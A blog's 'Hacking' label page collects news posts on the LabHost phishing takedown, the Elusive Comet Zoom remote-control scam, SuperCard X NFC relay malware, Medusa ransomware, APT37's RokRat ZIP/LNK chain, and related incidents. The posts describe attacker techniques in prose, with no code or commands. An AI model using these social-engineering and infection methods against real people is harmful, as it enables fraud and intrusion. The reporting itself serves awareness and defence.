Search This Blog
Powered by Blogger.

Blog Archive

Labels

About Me

Load More
Trendy Right Now

Popular Posts

Showing posts with label Hacking. Show all posts
takedown
Cyber Fraud Cyberattack CyberCrime Cybersecurity digitalcrime Europol Fraud Hacking LabHost LabRat lawenforcement phishing phishingkits phishingtools takedown

Global Cybercrime Crackdown Dismantles Major Phishing-as-a-Service Platform ‘LabHost’

 

In a major international crackdown, a law enforcement operation spearheaded by the London Metropolitan Police and coordinated by Europol has successfully taken down LabHost, one of the most notorious phishing-as-a-service (PhaaS) platforms used by cybercriminals worldwide.

Between April 14 and April 17, 2024, authorities carried out synchronized raids across 70 different sites globally, resulting in the arrest of 37 individuals. Among those arrested were four suspects in the UK believed to be the platform’s original creators and administrators. Following the arrests, LabHost’s digital infrastructure was completely dismantled.

LabHost had gained infamy for its ease of use and wide accessibility, making it a go-to cybercrime tool. The service offered more than 170 fake website templates imitating trusted brands from the banking, telecom, and logistics sectors—allowing users to craft convincing phishing campaigns with minimal effort.

According to authorities, LabHost supported over 40,000 phishing domains and catered to approximately 10,000 users across the globe. The coordinated enforcement effort was supported by Europol’s European Cybercrime Centre (EC3) and the Joint Cybercrime Action Taskforce (J-CAT), with 19 countries actively participating in the investigation.

LabHost showcased how cybercrime has become industrialized through subscription-based platforms. For a monthly fee of around $249, subscribers could access phishing kits, fraudulent websites, hosting services, and even tools to interact with victims in real-time.

One of its most dangerous features was LabRat, an integrated dashboard that enabled users to monitor ongoing phishing attacks. This tool also allowed cybercriminals to intercept two-factor authentication codes and login credentials, effectively bypassing modern security measures.

Its user-friendly interface eliminated the need for technical skills—opening the door for anyone with malicious intent and a credit card to launch sophisticated phishing schemes. The platform's popularity contributed to a spike in identity theft, financial fraud, and widespread data breaches.

Authorities hailed the takedown as a milestone in the fight against cybercrime. However, they also cautioned that the commoditization of cybercrime remains a serious concern.

"This is a critical blow to phishing infrastructure," cybersecurity experts said, "but the ease of recreating similar platforms continues to pose a major threat."

Following the seizure of LabHost’s backend systems, law enforcement agencies have begun analyzing the data to identify the perpetrators and their victims. This will mark the beginning of a new wave of investigations and preventative measures.

The operation involved agencies from 19 countries, including the FBI and Secret Service from the United States, as well as cybercrime units in Canada, Germany, the Netherlands, Poland, Spain, Australia, and the UK. This unprecedented level of international cooperation highlights the cross-border nature of cyber threats and the importance of unified global action.

As authorities prepare for a fresh wave of prosecutions, the LabHost takedown stands as a defining moment in cyber law enforcement—both in its impact and its symbolism.
Read more »
Pakistan
Cyber Attacks Cyber Warfare Hacking India Internet Pakistan

Pakistan State-sponsored Hackers Attack Indian Websites, Attempts Blocked

Pakistan State-sponsored Hackers Attack Indian Websites, Attempts Blocked

Pakistan's cyber warfare against India

Recently, Pakistan state-sponsored hacker groups launched multiple failed hacking attempts to hack Indian websites amid continuous cyber offensives against India after the Pahalgam terror attack. These breach attempts were promptly identified and blocked by the Indian cybersecurity agencies. 

In one incident, the hacking group “Cyber Group HOAX1337” and “National Cyber Crew” attacked the websites of the Army Public School in Jammu (a union territory in India), trying to loiter on the site with messages mocking the recent victims of the Pahalgam terror attack.

State-sponsored attacks against Indian websites

In another cyberattack, hackers defaced the website of healthcare services for ex-servicemen, the sites of Indian Air Force veterans and Army Institute of Hotel Management were also attacked. 

Besides Army-related websites, Pakistan-sponsored hackers have repeatedly tried to trespass websites associated with veterans, children, and civilians, officials said.

Additionally, the Maharashtra Cyber Department defected more than 10 lakh cyberattacks on Indian systems by hacking gangs from various countries after the April 22 terror attack on tourists in Pahalgam. 

Rise of targeted cyberattacks against India

A Maharashtra Cyber senior police official said that the state’s police cybercrime detection wing has noticed a sudden rise in digital attacks after the Kashmir terror strike.

Experts suspect these cyber attacks are part of a deliberate campaign to intensify tensions on digital platforms. These attempts are seen as part of Pakistan’s broader hybrid warfare plan, which has a history of using terrorism and information warfare against India. 

Besides Pakistan, cyberattacks have also surfaced from Indonesia, Morocco, and the Middle East. A lot of hacker groups have claimed links to Islamist ideologies, suggesting a coordinated cyber warfare operation, according to the police official. 

Read more »
Hacking
Crypto Cyber Attacks Cybersecurity Hacking

‘Elusive Comet’ Hackers Exploit Zoom to Target Crypto Users in Sophisticated Scam

 

A newly identified hacking group known as Elusive Comet is targeting cryptocurrency users through a deceptive campaign that leverages Zoom’s remote control feature to gain unauthorized access to victims' systems.

The remote control tool, built into Zoom, enables meeting participants to take control of another person's computer — a capability now being manipulated by cybercriminals to bypass technical defenses through social engineering rather than traditional code exploitation.

According to a report from cybersecurity firm Trail of Bits, the group’s tactics closely resemble those used in the $1.5 billion Bybit crypto heist believed to be linked to the Lazarus group.

"The ELUSIVE COMET methodology mirrors the techniques behind the recent $1.5 billion Bybit hack in February, where attackers manipulated legitimate workflows rather than exploiting code vulnerabilities," explains the Trail of Bits report.

Trail of Bits uncovered the campaign when attackers attempted to target their CEO via a direct message on X (formerly Twitter), posing as representatives of Bloomberg Crypto.

The ruse begins with a fraudulent invitation to a "Bloomberg Crypto" interview, sent to high-profile individuals either through email (bloombergconferences[@]gmail.com) or social media. The attackers use sock-puppet accounts, mimicking journalists or crypto media outlets, and send Calendly links to schedule the meeting.

Because both Calendly and Zoom links are genuine, the setup appears trustworthy to the victims. During the meeting, the attackers launch a screen-sharing session and issue a remote control request — with a crucial twist: their Zoom display name is changed to “Zoom.”

This results in a misleading prompt that reads:
"Zoom is requesting remote control of your screen,"
— tricking the target into thinking the request is from the app itself.

Granting access allows the attacker full remote control, enabling data theft, malware installation, unauthorized file access, or even the initiation of crypto transactions. In some cases, attackers establish persistence through hidden backdoors, remaining unnoticed even after disconnecting.

"What makes this attack particularly dangerous is the permission dialog's similarity to other harmless Zoom notifications," says Trail of Bits.
"Users habituated to clicking 'Approve' on Zoom prompts may grant complete control of their computer without realizing the implications."

To guard against such threats, Trail of Bits recommends the use of Privacy Preferences Policy Control (PPPC) profiles to restrict system accessibility permissions. For highly sensitive environments — particularly those handling digital assets or crypto transactions — the firm advises removing the Zoom desktop client entirely.

"For organizations handling particularly sensitive data or cryptocurrency transactions, the risk reduction from eliminating the Zoom client entirely often outweighs the minor inconvenience of using browser-based alternatives," explains Trail of Bits.
Read more »
SuperCardX
Android Hacking malware NFC phishing Skimming SuperCardX

SuperCard X Malware Turns Android Phones into NFC Relay Hubs for Real-Time Payment Fraud

 

Hackers are exploiting a Chinese-language malware-as-a-service (MaaS) platform known as SuperCard X to conduct near-field communication (NFC) relay attacks, enabling the theft of payment card data and real-time fraudulent transactions at point-of-sale (PoS) systems and ATMs. According to mobile security firm Cleafy, SuperCard X diverges from traditional banking malware by weaponizing the contactless features of modern payment cards, transforming infected Android devices into relay tools for instant cash-outs.

“Effectively turning any infected Android handset into an NFC relay station,” said mobile security firm Cleafy.

Cybercriminals can access preconfigured Reader and Tapper apps—used to capture and relay NFC card data—via Telegram channels, offering low-barrier entry into NFC fraud without the need to build custom tools.

The attack typically begins with spoofed messages sent via SMS or WhatsApp, impersonating a bank and warning of suspicious activity. Victims are urged to call a provided number, where scammers—posing as bank representatives—manipulate them into disabling card security settings through social engineering. Eventually, victims are sent a link to download the SuperCard X Reader, disguised as a legitimate security utility.

Once installed, the Reader app requests minimal NFC and system permissions, allowing it to evade standard antivirus detection. Cleafy’s research identified that SuperCard X reuses code from NFCGate and NGate, open-source frameworks that facilitate NFC relay functionalities.

Victims are tricked into tapping their payment cards against the infected Android device. This initiates silent harvesting of sensitive NFC data—such as Answer To Reset (ATR) messages—which are then transmitted via a secure HTTP-based command-and-control (C2) infrastructure, protected through mutual TLS encryption.

On the attacker’s side, the Tapper app—running on a separate Android phone—emulates the victim’s card using Host-based Card Emulation (HCE) mode. This allows the attacker to make contactless transactions at PoS terminals and ATMs, treating the emulated card as legitimate, especially after the victim has removed spending limits.

“SuperCard X distinguishes itself from conventional Android banking Trojans by omitting complex features such as screen overlays, SMS interception or remote desktop controls. It instead focuses on an NFC relay and streamlined permission model, granting it a low fingerprinting profile and allowing it to remain undetected by the vast majority of antivirus engines and behavioral monitors.”

In certain campaigns targeting users in Italy, Cleafy observed customized app versions distributed by affiliates. These variants had stripped-down interfaces—removing sign-up screens and Telegram links—and replaced them with benign app icons and names. During calls, fraudsters provide victims with pre-set credentials, eliminating the need for registration and further reducing the chance of user suspicion.
Read more »
Scam
Cyber Fraud Cyberattack CyberCrime Hacking Pune Scam

Pune Company Falls Victim to ₹6.49 Crore Cyber Fraud in Major Man-in-the-Middle Attack

 

A 39-year-old director of a Mohammedwadi-based firm, which operates in IT services and dry fruit imports, was duped into transferring ₹6.49 crore following a sophisticated Man-in-the-Middle (MitM) cyberattack on March 27. In a MitM scam, cybercriminals secretly intercept communications between two parties, impersonating one to deceive the other, often stealing sensitive information or funds.

According to investigators, the company director was at his residence near NIBM Road when he received what appeared to be a legitimate payment request via email from a business associate. Trusting the authenticity, he initiated the payment and even instructed his bank to process it. However, when he later contacted the exporter to confirm receipt, they denied getting any money.

Upon closer inspection, the director discovered subtle changes in the sender's email ID and bank account details — just one letter altered in the email address and a different bank account number. These minor discrepancies went unnoticed initially, police said.

Senior Inspector Swapnali Shinde of the Cyber Police told TOI, "It has two divisions, one for IT services and another for importing dry fruits. The company director would import the dry fruits from different countries, including the United States and those in the Middle-East. On March 27, he received a payment request from an exporter of dry fruits based in the US. The email demanded payment of nearly Rs 6.5 crore. The victim, thinking it was for the almonds he'd recently imported, initiated the transaction."

Realizing the fraud only on April 17, the director registered an FIR with Pune's cyber police on April 23.

Shinde added, "Officials from his bank called him to verify the transaction, but he told them to proceed. The amount was across in five transactions," explaining that the online ledger displayed only the first few letters of the firm's name and bank details.

"The victim did not realise that the account number of the company, with whom he had regular business with, was changed. He just clicked on the button and initiated the transactions," Shinde said.

Cyber investigators are now tracing the trail of the siphoned funds. "The cash went to several accounts. We're still trying to establish a trail. As of now we can say that about Rs 3 crore is yet to reach the suspects. We will try our best to salvage the money," Shinde stated.
Read more »
Ransomware
Cyber Security Cybersecurity Hacking Medusa Ransomware

Authorities Warn Against Medusa Ransomware Surge

 

 
Federal agencies are urging individuals and organizations to stay vigilant against a rising ransomware threat that has affected hundreds of new victims in recent weeks. The FBI, Cybersecurity and Infrastructure Security Agency (CISA), and Multi-State Information Sharing and Analysis Center (MS-ISAC) have jointly issued an advisory detailing the tactics used by Medusa ransomware and how to mitigate its impact.

First identified in June 2021, Medusa is a ransomware-as-a-service (RaaS) variant that primarily targets critical infrastructure sectors, including healthcare, education, legal, insurance, technology, and manufacturing. Through the RaaS model, the ransomware's developers delegate attack execution to affiliates, who have collectively compromised over 300 victims in the past month alone.

Initially, Medusa operated as a closed ransomware variant, where the same group that developed the malware also carried out attacks. However, it has since evolved into an affiliate-driven model, with developers recruiting attackers from dark web forums and paying them between $100 to $1 million per job.

Cybercriminals behind Medusa employ two primary attack vectors:
  • Phishing campaigns – Fraudulent emails trick users into downloading malicious attachments or clicking harmful links.
  • Exploiting unpatched vulnerabilities – Attackers take advantage of outdated software to infiltrate company networks.

Once inside, they utilize various legitimate tools to expand their access:

  • Advanced IP Scanner and SoftPerfect Network Scanner – Used to detect exploitable network vulnerabilities.
  • PowerShell and Windows command prompt – Help compile lists of targeted network resources.
  • Remote access tools like AnyDesk, Atera, and Splashtop – Assist in lateral movement across the system.
  • PsExec – Enables execution of files and commands with system-level privileges.
To avoid detection, attackers often disable security tools using compromised or signed drivers. They also delete PowerShell history and leverage Certutil to conceal their activity.

Similar to other ransomware strains, Medusa follows a double-extortion strategy. Not only do attackers encrypt stolen data, but they also threaten to leak it publicly if the ransom is not paid. Victims typically have 48 hours to respond, after which they may be contacted via phone or email.

A Medusa data leak site displays ransom demands along with a countdown timer. If victims need more time, they can delay the data release by paying $10,000 in cryptocurrency per extra day. Meanwhile, attackers may attempt to sell the stolen data to third parties even before the timer expires.

Federal authorities recommend the following preventative measures to reduce the risk of Medusa attacks:
  • Patch vulnerabilities – Keep all operating systems, software, and firmware updated.
  • Network segmentation – Prevent attackers from moving across connected systems.
  • Traffic filtering – Restrict access to internal services from untrusted sources.
  • Disable unused ports – Close unnecessary entry points to minimize security risks.
  • Backup critical data – Store multiple copies of important files in an isolated location.
  • Enable multifactor authentication (MFA) – Secure all accounts, especially those used for webmail, VPNs, and critical systems.
  • Monitor network activity – Use security tools to detect unusual patterns and alert administrators to potential threats.
By implementing these strategies, organizations can significantly lower their chances of falling victim to Medusa ransomware and other evolving cyber threats.
Read more »
Hacking
AI technology AI Threat CrowdStrike Cyber Security cyber threat CyberCrime cybercriminals Hacking

Cybercrime in 2025: AI-Powered Attacks, Identity Exploits, and the Rise of Nation-State Threats

 


Cybercrime has evolved beyond traditional hacking, transforming into a highly organized and sophisticated industry. In 2025, cyber adversaries — ranging from financially motivated criminals to nation-state actors—are leveraging AI, identity-based attacks, and cloud exploitation to breach even the most secure organizations. The 2025 CrowdStrike Global Threat Report highlights how cybercriminals now operate like businesses. 

One of the fastest-growing trends is Access-as-a-Service, where initial access brokers infiltrate networks and sell entry points to ransomware groups and other malicious actors. The shift from traditional malware to identity-based attacks is accelerating, with 79% of observed breaches relying on valid credentials and remote administration tools instead of malicious software. Attackers are also moving faster than ever. Breakout times—the speed at which cybercriminals move laterally within a network after breaching it—have hit a record low of just 48 minutes, with the fastest observed attack spreading in just 51 seconds. 

This efficiency is fueled by AI-driven automation, making intrusions more effective and harder to detect. AI has also revolutionized social engineering. AI-generated phishing emails now have a 54% click-through rate, compared to just 12% for human-written ones. Deepfake technology is being used to execute business email compromise scams, such as a $25.6 million fraud involving an AI-generated video. In a more alarming development, North Korean hackers have used AI to create fake LinkedIn profiles and manipulate job interviews, gaining insider access to corporate networks. 

The rise of AI in cybercrime is mirrored by the increasing sophistication of nation-state cyber operations. China, in particular, has expanded its offensive capabilities, with a 150% increase in cyber activity targeting finance, manufacturing, and media sectors. Groups like Vanguard Panda are embedding themselves within critical infrastructure networks, potentially preparing for geopolitical conflicts. 

As traditional perimeter security becomes obsolete, organizations must shift to identity-focused protection strategies. Cybercriminals are exploiting cloud vulnerabilities, leading to a 35% rise in cloud intrusions, while access broker activity has surged by 50%, demonstrating the growing value of stolen credentials. 

To combat these evolving threats, enterprises must adopt new security measures. Continuous identity monitoring, AI-driven threat detection, and cross-domain visibility are now critical. As cyber adversaries continue to innovate, businesses must stay ahead—or risk becoming the next target in this rapidly evolving digital battlefield.
Read more »
Threat Intelligence
APT37 Cyberattack Cybersecurity Data Breach Hacking North Korea phishing RokRat Threat Intelligence

North Korean Hackers Exploit ZIP Files in Sophisticated Cyber Attacks

 

State-sponsored hacking group APT37 (ScarCruft) is deploying advanced cyber-espionage tactics to infiltrate systems using malicious ZIP files containing LNK shortcuts. These files are typically disguised as documents related to North Korean affairs or trade agreements and are spread through phishing emails.

Once opened, the attack unfolds in multiple stages, leveraging PowerShell scripts and batch files to install the RokRat remote access Trojan (RAT) as the final payload.

The infection starts with carefully crafted phishing emails, often using real information from legitimate websites to enhance credibility. These emails contain malicious ZIP attachments housing LNK files. When executed, the LNK file verifies its directory path, relocating itself to %temp% if necessary.

It then extracts multiple components, including:

-A decoy HWPX document
-A batch script (shark.bat)

Additional payloads like caption.dat and elephant.dat
The shark.bat script executes PowerShell commands discreetly, launching the elephant.dat script, which decrypts caption.dat using an XOR key. The decrypted content is then executed in memory, ultimately deploying RokRat RAT.

Once active, RokRat collects detailed system information, such as:
  • Operating system version
  • Computer name
  • Logged-in user details
  • Running processes
  • Screenshots of the infected system
The stolen data is then exfiltrated to command-and-control (C2) servers via legitimate cloud services like pCloud, Yandex, and Dropbox, utilizing their APIs to send, download, and delete files while embedding OAuth tokens for stealthy communication.

RokRat also allows attackers to execute remote commands, conduct system reconnaissance, and terminate processes. To avoid detection, it implements anti-analysis techniques, including:
  • Detecting virtual environments via VMware Tools
  • Sandbox detection by creating and deleting temporary files
  • Debugger detection using IsDebuggerPresent
The malware ensures secure communication by encrypting data using XOR and RSA encryption, while C2 commands are received in AES-CBC encrypted form, decrypted locally, and executed on the compromised system. These commands facilitate data collection, file deletion, and malware termination.

By leveraging legitimate cloud services, RokRat seamlessly blends into normal network traffic, making detection more challenging.

“This sophisticated approach highlights the evolving tactics of APT37, as they continue to adapt and expand their operations beyond traditional targets, now focusing on both Windows and Android platforms through phishing campaigns.”

As APT37 refines its cyberattack strategies, organizations must remain vigilant against such persistent threats and enhance their cybersecurity defenses.
Read more »
Subscribe to: Posts (Atom)